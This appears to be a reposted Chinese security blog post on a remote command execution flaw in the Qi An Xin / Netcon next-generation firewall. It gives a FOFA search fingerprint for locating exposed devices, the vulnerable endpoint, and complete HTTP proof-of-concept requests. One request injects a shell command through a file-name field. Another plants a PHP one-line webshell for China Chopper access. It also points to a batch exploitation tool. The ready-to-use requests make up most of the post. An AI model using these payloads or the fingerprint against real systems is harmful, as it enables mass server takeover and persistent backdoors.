奇安信网康下一代防火墙(NGFW)是网康科技推出的一款可全面应对网络威胁的高性能应用层防火墙,存在远程命令执行,通过漏洞攻击者可以获取服务器权限。
fofa指纹:
app="网康科技-下一代防火墙"
漏洞路径:
/directdata/direct/router
POC:
POST /directdata/direct/router HTTP/1.1
Host: xxx
Connection: close
Content-Length: 160
Upgrade-Insecure-Requests: 1
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;id >/var/www/html/test.txt"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
访问:/test_test.txt :
写入 PHP 一句话木马:
POST /directdata/direct/router HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=o397gs3iq35r7qoikmh5klcs04; ys-active_page=s%3A
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Length: 194
{"action":"SSLVPN_Resource","method":"deleteImage","data":[{"data":["/var/www/html/d.txt;echo '<?php @eval($_POST[xxxx]);?>' >/var/www/html/test.php"]}],"type":"rpc","tid":17,"f8839p7rqtj":"="}
菜刀连接:
批量验证工具:
放在知识星球
验证截图:
使用方法:
java -jar xxx.jar
小知识
声明
原文始发于微信公众号(丁永博的成长日记):奇安信网康科技防火墙远程命令执行漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论